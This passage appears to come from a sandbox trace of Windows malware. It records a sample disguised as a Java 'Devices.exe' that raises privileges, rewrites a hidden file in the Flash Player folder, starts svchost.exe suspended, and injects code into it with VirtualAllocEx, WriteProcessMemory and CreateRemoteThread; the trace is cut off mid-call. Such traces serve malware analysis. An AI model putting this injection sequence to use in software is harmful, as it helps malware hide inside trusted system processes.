CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0002, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", cchWideChar=140, lpMultiByteStr=0x126f820, cbMultiByte=141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:21] ver=2.2.5, log=0x0002, PID=0x0084, TID=0x0BCC, LE=0(0x0)\r\nINFO: Current OS guid {2BD2C9F3-0000-0000-0010000000000000}.", lpUsedDefaultChar=0x0) returned 140 [0058.752] GetSystemTime (in: lpSystemTime=0xdcf2e0 | out: lpSystemTime=0xdcf2e0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x15, wMilliseconds=0xa7)) [0058.752] SystemTimeToFileTime (in: lpSystemTime=0xdcf2e0, lpFileTime=0xdcf2d0 | out: lpFileTime=0xdcf2d0) returned 1 [0058.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Devices.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0058.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Devices.exe", cchWideChar=11, lpMultiByteStr=0x126f7b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Devices.exe", lpUsedDefaultChar=0x0) returned 11 [0058.753] GetUserNameExW () returned 0x1 [0058.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0058.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x126f9b8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0058.754] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="8A") returned 2 [0058.754] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="00") returned 2 [0058.754] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="00") returned 2 [0058.754] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="00") returned 2 [0058.754] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="B7") returned 2 [0058.754] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="49") returned 2 [0058.754] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="67") returned 2 [0058.754] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="98") returned 2 [0058.755] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="F6") returned 2 [0058.755] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="14") returned 2 [0058.755] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="59") returned 2 [0058.755] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="35") returned 2 [0058.755] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="AA") returned 2 [0058.755] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="3E") returned 2 [0058.755] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="27") returned 2 [0058.755] wvnsprintfW (in: pszDest=0xdcf0c8, cchDest=6, pszFmt="%02X", arglist=0xdcf0a4 | out: pszDest="60") returned 2 [0058.755] CreateMutexW (lpMutexAttributes=0xbee89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1e0 [0058.755] WaitForSingleObject (hHandle=0x1e0, dwMilliseconds=0xffffffff) returned 0x0 [0058.755] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0058.755] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0058.755] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0058.756] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0058.756] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0058.756] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0058.757] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0058.757] GetCurrentThread () returned 0xfffffffe [0058.757] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0xdcf32c | out: TokenHandle=0xdcf32c*=0x0) returned 0 [0058.757] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xdcf32c | out: TokenHandle=0xdcf32c*=0x210) returned 1 [0058.757] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0xdcf334 | out: lpLuid=0xdcf334*(LowPart=0x8, HighPart=0)) returned 1 [0058.758] AdjustTokenPrivileges (in: TokenHandle=0x210, DisableAllPrivileges=0, NewState=0xdcf330*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0058.758] GetLastError () returned 0x0 [0058.758] CloseHandle (hObject=0x210) returned 1 [0058.758] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0058.758] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x106c640, lpbSaclPresent=0xdcf364, pSacl=0xdcf358, lpbSaclDefaulted=0xdcf360 | out: lpbSaclPresent=0xdcf364, pSacl=0xdcf358, lpbSaclDefaulted=0xdcf360) returned 1 [0058.758] SetNamedSecurityInfoW () returned 0x0 [0058.765] LocalFree (hMem=0x106c640) returned 0x0 [0058.765] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0058.765] GetCurrentThread () returned 0xfffffffe [0058.765] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0xdcf32c | out: TokenHandle=0xdcf32c*=0x0) returned 0 [0058.765] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xdcf32c | out: TokenHandle=0xdcf32c*=0x210) returned 1 [0058.765] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0xdcf334 | out: lpLuid=0xdcf334*(LowPart=0x8, HighPart=0)) returned 1 [0058.766] AdjustTokenPrivileges (in: TokenHandle=0x210, DisableAllPrivileges=0, NewState=0xdcf330*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0058.766] GetLastError () returned 0x0 [0058.766] CloseHandle (hObject=0x210) returned 1 [0058.766] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0058.766] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x106c5d0, lpbSaclPresent=0xdcf364, pSacl=0xdcf358, lpbSaclDefaulted=0xdcf360 | out: lpbSaclPresent=0xdcf364, pSacl=0xdcf358, lpbSaclDefaulted=0xdcf360) returned 1 [0058.766] SetNamedSecurityInfoW () returned 0x0 [0058.769] LocalFree (hMem=0x106c5d0) returned 0x0 [0058.769] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0058.769] GetFileSizeEx (in: hFile=0x210, lpFileSize=0xdcf378 | out: lpFileSize=0xdcf378*=265) returned 1 [0058.769] VirtualAlloc (lpAddress=0x0, dwSize=0x109, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0058.769] ReadFile (in: hFile=0x210, lpBuffer=0xf10000, nNumberOfBytesToRead=0x109, lpNumberOfBytesRead=0xdcf384, lpOverlapped=0x0 | out: lpBuffer=0xf10000*, lpNumberOfBytesRead=0xdcf384*=0x109, lpOverlapped=0x0) returned 1 [0058.770] CloseHandle (hObject=0x210) returned 1 [0058.771] wvnsprintfA (in: pszDest=0x126ffc0, cchDest=21, pszFmt="%d", arglist=0xdcf2c8 | out: pszDest="1476366141") returned 10 [0058.772] wvnsprintfA (in: pszDest=0x11f4800, cchDest=21, pszFmt="%d", arglist=0xdcf2c8 | out: pszDest="1476366141") returned 10 [0058.773] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0058.774] WriteFile (in: hFile=0x210, lpBuffer=0x11f4a80*, nNumberOfBytesToWrite=0x211, lpNumberOfBytesWritten=0xdcf37c, lpOverlapped=0x0 | out: lpBuffer=0x11f4a80*, lpNumberOfBytesWritten=0xdcf37c, lpOverlapped=0x0) returned 1 [0058.778] CloseHandle (hObject=0x210) returned 1 [0058.781] ReleaseMutex (hMutex=0x1e0) returned 1 [0058.781] CloseHandle (hObject=0x1e0) returned 1 [0058.781] SetLastError (dwErrCode=0x0) [0058.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xdcf7b2, cbMultiByte=20, lpWideCharStr=0xdcfa34, cchWideChar=150 | out: lpWideCharStr="Sun\\Java\\Devices.exe\x01") returned 20 [0058.781] StrCmpNIW (lpStr1="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", lpStr2="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe", nChar=43) returned 0 [0058.782] lstrcmpiW (lpString1="Sun\\Java\\Devices.exe", lpString2="Sun\\Java\\Devices.exe") returned 0 [0058.782] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="9C") returned 2 [0058.782] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="00") returned 2 [0058.782] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="00") returned 2 [0058.782] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="00") returned 2 [0058.782] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="2C") returned 2 [0058.782] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="CF") returned 2 [0058.782] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="1F") returned 2 [0058.782] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="00") returned 2 [0058.782] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="EC") returned 2 [0058.783] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="D7") returned 2 [0058.783] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="70") returned 2 [0058.783] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="C4") returned 2 [0058.783] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="03") returned 2 [0058.783] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="E9") returned 2 [0058.783] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="DE") returned 2 [0058.783] wvnsprintfW (in: pszDest=0xdcf908, cchDest=6, pszFmt="%02X", arglist=0xdcf8e4 | out: pszDest="7B") returned 2 [0058.783] CreateMutexW (lpMutexAttributes=0xbee89c, bInitialOwner=1, lpName="9C0000002CCF1F00ECD770C403E9DE7B") returned 0x1e0 [0058.783] GetLastError () returned 0x0 [0058.783] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0xdcf958 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0058.784] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="D2") returned 2 [0058.784] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="00") returned 2 [0058.784] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="00") returned 2 [0058.784] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="00") returned 2 [0058.784] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="2A") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="14") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="C6") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="E5") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="29") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="64") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="F5") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="19") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="32") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="B9") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="F4") returned 2 [0058.785] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="9F") returned 2 [0058.785] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="D20000002A14C6E52964F51932B9F49F") returned 0x0 [0058.785] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="D20000002A14C6E52964F51932B9F49F") returned 0x0 [0058.786] PathCombineW (in: pszDest=0xdcf958, pszDir="C:\\Windows\\SysWOW64", pszFile="svchost.exe -k netsvcs" | out: pszDest="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs") returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0058.786] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xdcf8e0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdcf880 | out: lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessInformation=0xdcf880*(hProcess=0x21c, hThread=0x210, dwProcessId=0x2ec, dwThreadId=0x540)) returned 1 [0058.983] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="54") returned 2 [0058.983] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="00") returned 2 [0058.983] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="00") returned 2 [0058.983] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="00") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="F6") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="1A") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="7D") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="E2") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="C2") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="94") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="AD") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="96") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="53") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="CF") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="D4") returned 2 [0058.984] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="FD") returned 2 [0058.984] CreateMutexW (lpMutexAttributes=0xbee89c, bInitialOwner=1, lpName="54000000F61A7DE2C294AD9653CFD4FD") returned 0x218 [0058.984] GetLastError () returned 0x0 [0058.985] IsBadReadPtr (lp=0xbd0000, ucb=0x24000) returned 0 [0058.987] VirtualAllocEx (hProcess=0x21c, lpAddress=0x0, dwSize=0x24000, flAllocationType=0x3000, flProtect=0x40) returned 0x4eb0000 [0059.010] WriteProcessMemory (in: hProcess=0x21c, lpBaseAddress=0x4eb0000, lpBuffer=0x11f47e0*, nSize=0x24000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x11f47e0*, lpNumberOfBytesWritten=0x0) returned 1 [0059.104] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x218, hTargetProcessHandle=0x21c, lpTargetHandle=0xdcf3a4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xdcf3a4*=0x4) returned 1 [0059.104] WriteProcessMemory (in: hProcess=0x21c, lpBaseAddress=0x4ece724, lpBuffer=0xdcf3b4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xdcf3b4*, lpNumberOfBytesWritten=0x0) returned 1 [0059.163] WriteProcessMemory (in: hProcess=0x21c, lpBaseAddress=0x4ece840, lpBuffer=0xdcf3a8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xdcf3a8*, lpNumberOfBytesWritten=0x0) returned 1 [0059.207] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x1dc, hTargetProcessHandle=0x21c, lpTargetHandle=0xdcf390, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xdcf390*=0x8) returned 1 [0059.207] WriteProcessMemory (in: hProcess=0x21c, lpBaseAddress=0x4ecee38, lpBuffer=0xdcf390*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xdcf390*, lpNumberOfBytesWritten=0x0) returned 1 [0059.234] CreateRemoteThread (in: hProcess=0x21c, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4ebc978, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x220 [0059.270] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x1388) returned 0x102 [0064.294] CloseHandle (hObject=0x220) returned 1 [0064.295] CloseHandle (hObject=0x218) returned 1 [0064.295] CloseHandle (hObject=0x210) returned 1 [0064.295] CloseHandle (hObject=0x21c) returned 1 [0064.295] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0xdcf958 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0064.295] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="A1") returned 2 [0064.296] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="00") returned 2 [0064.296] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="00") returned 2 [0064.296] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="00") returned 2 [0064.296] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="DA") returned 2 [0064.296] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="6A") returned 2 [0064.296] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="F3") returned 2 [0064.296] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="82") returned 2 [0064.296] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="35") returned 2 [0064.296] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="D3") returned 2 [0064.297] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="5B") returned 2 [0064.297] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="F5") returned 2 [0064.297] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="70") returned 2 [0064.297] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="C2") returned 2 [0064.297] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="C4") returned 2 [0064.297] wvnsprintfW (in: pszDest=0xdcf610, cchDest=6, pszFmt="%02X", arglist=0xdcf5ec | out: pszDest="E9") returned 2 [0064.297] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="A1000000DA6AF38235D35BF570C2C4E9") returned 0x0 [0064.297] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="A1000000DA6AF38235D35BF570C2C4E9") returned 0x0 [0064.298] PathCombineW (in: pszDest=0xdcf958, pszDir="C:\\Windows\\SysWOW64", pszFile="svchost.exe -k netsvcs" | out: pszDest="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs") returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0064.298] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xdcf8e0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdcf880 | out: lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessInformation=0xdcf880*(hProcess=0x210, hThread=0x21c, dwProcessId=0xc54, dwThreadId=0xc58)) returned 1 [0064.320] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="AD") returned 2 [0064.320] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="00") returned 2 [0064.321] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="00") returned 2 [0064.321] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="00") returned 2 [0064.321] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="2B") returned 2 [0064.321] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="44") returned 2 [0064.321] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="77") returned 2 [0064.322] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="54") returned 2 [0064.322] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="6D") returned 2 [0064.322] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, pszFmt="%02X", arglist=0xdcf28c | out: pszDest="3A") returned 2 [0064.322] wvnsprintfW (in: pszDest=0xdcf2b0, cchDest=6, 